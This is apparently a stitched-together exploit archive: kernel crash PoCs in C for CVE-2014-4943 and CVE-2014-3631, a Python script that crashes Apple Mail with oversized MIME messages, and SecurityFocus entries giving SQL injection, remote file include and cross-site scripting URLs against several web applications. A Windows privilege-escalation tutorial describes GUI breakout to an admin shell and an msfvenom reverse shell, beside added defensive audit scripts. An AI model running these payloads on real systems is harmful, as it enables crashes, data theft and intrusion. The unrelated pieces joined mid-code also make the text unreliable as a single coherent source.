  sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
  sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
  sax.pppol2tp.addr.sin_family = AF_INET;
  sax.pppol2tp.s_tunnel = 8;//tunnel_id;
  sax.pppol2tp.s_session = 0;     /* special case: mgmt socket */
  sax.pppol2tp.d_tunnel = 0;
  sax.pppol2tp.d_session = 0;     /* special case: mgmt socket */

  if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
  {
    perror("connect failed");
  }
  
  /* Connect L2TP socket */
  struct sockaddr_pppol2tp sax2;

  memset(&sax, 0, sizeof(sax2));
  sax2.sa_family = AF_PPPOX;
  sax2.sa_protocol = PX_PROTO_OL2TP;
  sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
  sax2.pppol2tp.s_session = 1;     
  sax2.pppol2tp.d_tunnel = 0;
  sax2.pppol2tp.d_session = 1;     

  if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
  {
    perror("connect failed");
  }
  
  
  /*
     * Entering critical part
     */
    printf("[cve_2014_4943]:  Panic!\n");
  
  //modifyUDPvalues(tunnel_fd);
  modifyUDPvalues(tunnel_fd2);

  
  // close opened socket  
  puts("\n [+] Closing sockets...");
  close(tunnel_fd);
  close(tunnel_fd2);
    
  exit(0);
}
            
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-3631_poc.c
 * 
 * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 
 * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) 
 * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation. 
 *
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * 
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c  -lkeyutils 
 * 
 * 
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/


/* -----------------------   Includes ----------------------------*/

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <inttypes.h>
#include <keyutils.h>
#include <fcntl.h>


#define TARGET_KERNEL_MIN "3.13.0"
#define TARGET_KERNEL_MAX "3.16.2"
#define EXPLOIT_NAME "cve-2014-3631"
#define EXPLOIT_TYPE DOS


/* -----------------------   functions ----------------------------*/



/**
 * Poc for cve_2014_3631 vulnerability
 */
int main()
{
  key_serial_t currentKey = 0;
  key_serial_t topKey = 0;
  int i = 0;
  int fp;
  char kname[16]={0};
  char gc_delay[16] = {0};
  int delay  =0;
  
  printf("[cve_2014_3631]: Preparing to exploit.\n");

  // fetch garbage collector value..
  fp = open("/proc/sys/kernel/keys/gc_delay",O_RDONLY);
  if(fp == -1)
  {
     printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
     delay = 300;
  }
  else
  {
    read(fp, gc_delay, sizeof(gc_delay) - 1); /* leave room for the terminating NUL */
    delay = atoi(gc_delay);
    close(fp);  
  }

  // Add top key
  topKey = add_key("keyring","Lvl1K",NULL,0,KEY_SPEC_USER_KEYRING);
  if(topKey == -1)
  {
    printf("[cve_2014_3631 error]: keyring  fault\n");
    perror("add_key");
    return -1;
  }
  
  // Add 18 keys to top key
  for(i=0; i< 18; i++)
  {
    memset(kname,00,sizeof(kname));
    memcpy(kname,"Lvl2K_",strlen("Lvl2K_"));
    sprintf(kname+strlen("Lvl2K_"),"%d",i);
    currentKey = add_key("keyring",kname,NULL,0,topKey);
    if(currentKey == -1)
    {
      printf("[cve_2014_3631 error]: keyring  fault\n");
      perror("add_key");
      return -1;
    }
  } 
  
  /* Entering exploit critical code */
  printf("[cve_2014_3631]:  Exploit!\n");
  
  // Set timeout and wait for garbage collector
  keyctl_set_timeout(currentKey, 2);
  
  // Wait for garbage collector
  printf("[cve_2014_3631]: Exploit triggered, system will panic in  %d seconds..\n",delay);
  
  return 0;
}
            
source: https://www.securityfocus.com/bid/50426/info

SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SjXjV 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--

http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5 
            
source: https://www.securityfocus.com/bid/50428/info

Plici is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/l1/p48-search.html[XSS] 
            

Normally, we are used to escalating privileges from the command line, and in fact that is how it goes 95 percent of the time. However, there are occasions where, through the graphical interface, a program that is installed or opened runs directly as administrator without asking for that account's password. In that case we may be able to break out of the application and launch a cmd as the same user that is running the process.

Let's look at an example using the vulnerable environment set up by the "tib3rius" script, which you can find in his repository.

Index:

  • Exploitation example
  • A real-world example of this exploitation
  • References

Exploitation example

In this environment, the program that runs as the administrator user when launched is Paint:

[image]

We have logged in to the machine as the user "user", an unprivileged user:

[image]

Back to Paint: when we double-click it, it asks for nothing and simply opens, because it is configured to do so:

[image]

However, we can confirm that it is being run by the administrator user with the following command:

tasklist /V | findstr <programa>

Tasklist shows the list of processes currently running on the machine. With the /V argument it shows more detailed output.

Findstr is simply the equivalent of grep on Linux systems.

[image]

Knowing this, we go back to Paint. What is usually done in these cases is to look for some feature of the program that lets us break out of it. The most typical approach is to try to open the file explorer dialog, whether to select a path, open a file, or anything else:

[image]

With the file explorer open, we can open a cmd as follows:

[image]

NOTE: we could also break out and open powershell.exe with "SHIFT + Right Click":

[image]

In this way we also manage to break out and run a cmd in the context of whoever is running Paint, in this case admin. This happens because the parent process (Paint) is running as administrator, so the cmd, being a child process, runs with the same privileges. In Process Explorer it looks like this:

[image]

So this is not a vulnerability in Paint as such; the problem is the misconfiguration that makes this application run directly as administrator.
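
An audit for this misconfiguration, as an added example that is not part of the original post: it reads saved `tasklist /V /FO CSV` output and reports windowed programs running under an account other than the user who owns the desktop session. The sample rows are constructed for the lab described above, and treating the account that runs explorer.exe as the session owner is an assumption.

```python
"""Added example: find GUI programs running as a different account than the desktop user."""
import csv
import io

# Constructed sample of `tasklist /V /FO CSV` output (host and PIDs are made up).
SAMPLE = r'''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","812","Services","0","9,876 K","Unknown","NT AUTHORITY\SYSTEM","0:00:03","N/A"
"winlogon.exe","604","Console","1","7,120 K","Unknown","NT AUTHORITY\SYSTEM","0:00:00","N/A"
"explorer.exe","3120","Console","1","84,212 K","Running","DESKTOP-LAB\user","0:00:12","N/A"
"notepad.exe","4820","Console","1","12,100 K","Running","DESKTOP-LAB\user","0:00:00","Untitled - Notepad"
"mspaint.exe","4512","Console","1","31,004 K","Running","DESKTOP-LAB\admin","0:00:01","Untitled - Paint"
'''


def load_rows(text):
    """Parse the CSV output into one dict per process."""
    return list(csv.DictReader(io.StringIO(text)))


def session_owners(rows):
    """Map session number to the account running explorer.exe in that session."""
    owners = {}
    for row in rows:
        if row["Image Name"].lower() == "explorer.exe":
            owners.setdefault(row["Session#"], row["User Name"].lower())
    return owners


def windows_under_other_account(rows):
    """Return (image, pid, user) for windowed processes not owned by the session user."""
    owners = session_owners(rows)
    findings = []
    for row in rows:
        owner = owners.get(row["Session#"])
        user = row["User Name"]
        if owner is None or user == "N/A":
            continue  # no desktop shell in that session, or tasklist could not query it
        has_window = row["Window Title"] not in ("", "N/A")
        if has_window and user.lower() != owner:
            findings.append((row["Image Name"], int(row["PID"]), user))
    return findings


if __name__ == "__main__":
    for image, pid, user in windows_under_other_account(load_rows(SAMPLE)):
        print(f"{image} (PID {pid}) shows a window on the user's desktop but runs as {user}")
```

Every hit is a program whose file dialogs and child processes inherit the other account's privileges, so each one should either run as the logged-in user or be removed from the desktop.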

Now, if we are "anti-GUI", we can simply transfer an "exe" file generated with msfvenom so that it runs a reverse shell for us:

  • I start listening on Kali:
[image]
  • I run the "exe" that I transferred to Windows, which gives me a reverse shell to Kali on port 4444:
[image]

In this way, having taken advantage of a vulnerability through the graphical interface, we have ultimately managed to escalate privileges and obtain a shell as Administrator.

A real-world example of this exploitation

Not long ago (at least at the time of writing this post), in August 2021, a vulnerability was published that allowed privilege escalation using Razer devices. The escalation was carried out in practically the same way as explained in this post.

The basic idea is that when a Razer device is physically connected, Windows automatically downloads and installs the "Razer Synapse Software", and it does so as the SYSTEM user (all without asking for permission; it is automatic). At one point the installation wizard lets us open the file explorer to select the installation path, and from there we simply do what has been explained in this post.

This is the original tweet about the vulnerability, which contains a video of the exploitation:

Need local admin and have physical access?
– Plug a Razer mouse (or the dongle)
– Windows Update will download and execute RazerInstaller as SYSTEM
– Abuse elevated Explorer to open Powershell with Shift+Right click

Tried contacting @Razer, but no answers. So here's a freebie pic.twitter.com/xDkl87RCmz

— jonhat (@j0nh4t) August 21, 2021

Of course, this literally meant that anyone with a Razer device and physical access to a machine was able to escalate privileges.

For more information, here are other sources that discuss in detail how it works:

  • Razer bug lets you become a Windows 10 admin by plugging in a mouse
  • You Can Get Admin Privileges On Windows 10 With A Razer Mouse

References

  • Windows Privilege Escalation for OSCP & Beyond!
  • Windows-PrivEsc-Setup
  • Original tweet about the vulnerability in Razer devices
  • Razer bug lets you become a Windows 10 admin by plugging in a mouse
  • You Can Get Admin Privileges On Windows 10 With A Razer Mouse

source: https://www.securityfocus.com/bid/50446/info

Apple Mac OS X and iOS are prone to a denial-of-service vulnerability.

Attackers can exploit this issue to cause the affected mail client to crash, effectively denying service. 

#!/usr/bin/env python

# Mail of death for Apple's Mail.app
#
# Tested & vulnerable:  Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42

import smtplib

n_attach=2040 # ~2024 is sufficient
relay='your.mta.goes.here'
mailfrom = 'mail_of_death@example.com'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'


def craft_mail():
    header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
    body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
    attach = '--delim\nContent-Disposition: inline\n\n'*n_attach

    ### Another, slightly longer option to crash Mail.app (same bug)
    # attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n'*n_attach
    return header + body + attach


def send_mail(mail):
    server = smtplib.SMTP(relay)
    server.sendmail(mailfrom, mailto, mail)
    server.quit()

mail=craft_mail()
#print mail
send_mail (mail)
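
A mail-gateway check for the message shape this script produces, as an added example that is not part of the original PoC: it counts MIME leaf parts and empty parts and quarantines messages above a limit. The limit of 100 and both sample messages are constructed assumptions; the second sample reuses the page's structure with only 150 empty parts.

```python
"""Added example: flag messages with an excessive number of MIME parts."""
import email
from email import policy

MAX_PARTS = 100  # assumed gateway limit, far below the ~2024 parts the PoC needs


def assess(raw, max_parts=MAX_PARTS):
    """Parse one raw message and report its part count and a quarantine decision."""
    msg = email.message_from_string(raw, policy=policy.default)
    leaves = [part for part in msg.walk() if not part.is_multipart()]
    # Parts with headers but no body, the filler pattern used by the PoC.
    empty = sum(1 for part in leaves if not str(part.get_payload()).strip())
    return {
        "parts": len(leaves),
        "empty_parts": empty,
        # Parser defects, e.g. a multipart body that never closes its boundary.
        "defects": [type(d).__name__ for d in msg.defects],
        "quarantine": len(leaves) > max_parts,
    }


# Constructed sample 1: an ordinary message with a text body and one attachment.
BENIGN = """\
From: alice@example.com
To: bob@example.com
Subject: report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="delim"

--delim
Content-Type: text/plain

See attached.
--delim
Content-Type: text/plain
Content-Disposition: attachment; filename="notes.txt"

line one
--delim--
"""

# Constructed sample 2: one text part followed by 150 empty inline parts and
# no closing boundary, the same layout craft_mail() builds at a larger scale.
OVERSIZED = (
    "From: sender@example.com\n"
    "To: bob@example.com\n"
    "Subject: many parts\n"
    'Content-Type: multipart/mixed; boundary="delim"\n'
    "\n"
    "--delim\nContent-Type: text/plain\n\nHello\n"
    + "--delim\nContent-Disposition: inline\n\n" * 150
)

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, assess(raw))
```
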
            
source: https://www.securityfocus.com/bid/50455/info

vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

vBulletin 4.1.7 is vulnerable; other versions may also be affected. 

http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] 
            
source: https://www.securityfocus.com/bid/50456/info

Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.

These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. 

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.
For demonstration or reproduce ...

1.1
Code Review: HQ Roles  [IVE - Persistent]

<td width="30%" class="BlockContent">
<!-- END VIEW MODE --> 
</td></tr><tr valign="top">
<td width="20%" class="BlockLabel">Dashboard Name:</td>
<td width="30%" class="BlockContent">
<span id="dashboardString">New Role Dashboard</span></td>
<td width="20%" class="BlockLabel"></td>
<td width="30%" class="BlockContent"></td></tr></table>
<!--  /  -->


Code Review: java.security.krb5.kdc   Module: HQ Health / HQ Process Information & Diagnostics  [IVE - Persistent]

- java.rmi.server.codebase = http://h1461735:9093/ 
- java.rmi.server.hostname = h1461735 
- java.runtime.name = Java(TM) SE Runtime Environment 
- java.runtime.version = 1.6.0_13-b03 
- java.security.krb5.kdc = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
- java.security.krb5.realm = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
- java.specification.name = Java Platform API Specification 
- java.specification.vendor = Sun Microsystems Inc. 
- java.specification.version = 1.6 
- java.vendor = Sun Microsystems Inc. 

.../PoC/printReport(poc).hqu



Code Review: Browse - Monitor - Indicators  [IVE - Persistent]


hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
            if (arguments.callee.done) return;

... or

  hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
  hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
  <title>
   >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
  </title>
    <script type="text/javascript">
        var onloads = [];
         function initOnloads() {
        
            if (arguments.callee.done) return;
            arguments.callee.done = true;
           if(typeof(_timer)!="undefined") clearInterval(_timer);
           for ( var i = 0 ; i < onloads.length ; i++ )
             onloads[i]();



Code Review: Applications - All Applications - Topic  [IVE - Persistent]

<li class="hasSubmenu"><a href="">Recently Viewed</a><div><ul>
<li><a href="/Resource.do?eid=4:10001">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;
</a></li></ul></div></li></ul></div></li><li id="analyzeTab"><a href="#">Analyze</a><div><ul>



Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]

<div id="exception27" style="visibility:hidden">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException: 
An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert 
String ">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>" to type "java.lang.Integer"
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
  at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
  at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
  at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
  at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
  at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
  at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
  at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
  at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
  at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
  at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
  at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
  at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
  at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
  at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
  at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
  at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
  at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
  at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
  at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
  at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
  at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
  at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
  at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
  at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
  at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
  at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
  at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
  at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
  at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
  at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
  at java.lang.Thread.run(Unknown Source) </div>


1.2
References:
http://www.example.com/admin/role/RoleAdmin.do?mode=new
http://www.example.com/hqu/health/health/printReport.hqu
http://www.example.com/Resource.do?eid=4:10001
http://www.example.com/ResourceHub.do
http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=




Code Review: Escalation Schemes Configuration [XSS]

http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]

References:
http://www.example.com/admin/config/Config.do?mode=escalate&escId=
            
source: https://www.securityfocus.com/bid/50454/info

Domain Shop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/index.php
Search Box
"><script>alert(document.domain)</script>
            
source: https://www.securityfocus.com/bid/50468/info

IBSng is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/IBSng/util/show_multistr.php?str=[xss] 
            
source: https://www.securityfocus.com/bid/50469/info

eFront is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. 

http://example.com/administrator.php?ctg=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&user=admin&op=dashboard

http://example.com/administrator.php?ctg=personal&user='%20stYle=x:expre/**/ssion(alert(9))%20ns='%20&op=dashboard

http://example.com/administrator.php?ctg=calendar&view_calendar=%22%20stYle=x:expre/**/ssion(alert(9))%20ns=%22

http://example.com/index.php?ctg=lesson_info&lessons_ID=2&course='%20stYle='x:expre/**/ssion(alert(9))
            
source: https://www.securityfocus.com/bid/50470/info

Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Symphony versions prior to 2.2.4 are vulnerable. 

http://example.com/symphony/publish/images/?filter='"--></style></script><script>alert(1)</script>
            
source: https://www.securityfocus.com/bid/50470/info

